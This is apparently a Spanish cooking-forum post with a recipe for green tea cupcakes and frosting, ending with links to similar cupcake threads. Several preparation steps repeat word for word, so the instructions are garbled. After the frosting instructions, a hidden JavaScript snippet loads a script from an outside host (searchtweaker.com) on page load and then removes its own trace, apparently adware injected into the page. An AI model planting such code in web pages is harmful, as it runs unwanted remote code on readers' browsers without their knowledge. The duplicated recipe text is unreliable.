Cupcakes de Té Verde
Página 1 de 1.
Cupcakes de Té Verde
[Tienes que estar registrado y conectado para ver esa imagen]
´
Receta para 6 cupcakes
Ingredientes para la base:
- 75gr de mantequilla
- 50gr de azúcar moreno
- 75gr de cacao en polvo
- 1 huevo
- 2 bolsitas de te verde
- 100gr harina para bizcochos
- 2 cucharadas de leche
- 1 pizca de sal
- 1 cucharadita de levadura en polvo
Ingredientes para el frosting de Té Verde:
- 100gr de mantequilla
- 100gr de azúcar glas
- 50gr de Te verde
- Unas gotas de colorante verde
- Ralladura de chocolate para decorar
ELABORACION
Para preparar la receta de cupcakes de Té verde, comienza por poner a precalentar el horno a 180°C.
A continuación, en un recipiente o bol añade los 75gr de mantequilla, las 2 cucharadas de leche y los 50gr de azúcar moreno, y bate durante aproximadamente tres minutos con la ayuda de unas varillas eléctricas.
Seguidamente incorpora el huevo a la mezcla y sigue batiendo hasta obtener una masa uniforme.
A continuación, en un recipiente o bol añade los 75gr de mantequilla, las 2 cucharadas de leche y los 50gr de azúcar moreno, y bate durante aproximadamente tres minutos con la ayuda de unas varillas eléctricas.
Seguidamente incorpora el huevo a la mezcla y sigue batiendo hasta obtener una masa uniforme.
En otro recipiente, tamiza los 100gr harina para bizcochos con la cucharadita de levadura en polvo, los 75gr de cacao y la pizca de sal, y mézclalo todo con la masa. Remueve los ingredientes hasta conseguir una masa homogénea.
Por ultimo incorpora el Té verde y bate la mezcla muy bien hasta conseguir una masa uniforme.
Prepara los moldes para cupcakes y reparte la masa en cada uno de ellos y ponlos en el horno durante unos 15 o 20 minutos, o hasta que la masa suba y gane consistencia.
Retira con cuidado los cupcakes de Té verde del horno y deja que se enfríen.
Por ultimo incorpora el Té verde y bate la mezcla muy bien hasta conseguir una masa uniforme.
Prepara los moldes para cupcakes y reparte la masa en cada uno de ellos y ponlos en el horno durante unos 15 o 20 minutos, o hasta que la masa suba y gane consistencia.
Retira con cuidado los cupcakes de Té verde del horno y deja que se enfríen.
Cómo preparar el frosting de Té Verde
Para hacer frosting de Té verde pon un cazo a calentar a fuego lento y vierte en él los 100gr mantequilla junto con los 100gr de azúcar glas y los 50gr de Té verde y remueve. Retira el cazo del fuego cuando los ingredientes se hayan disuelto y a continuación añade unas gotas de colorante verde y deja enfriar unas horas el frosting de Té verde antes de untar en los cupcakes. Decora los cupcakes con chocolate rallado.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Temas similares
» Cupcakes para San Valentín
» Cupcakes Red Velvet.
» Cajero automático de cupcakes
» Cupcakes de chocolate y moka
» Cupcakes de Nocilla y avellanas
» Cupcakes Red Velvet.
» Cajero automático de cupcakes
» Cupcakes de chocolate y moka
» Cupcakes de Nocilla y avellanas
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.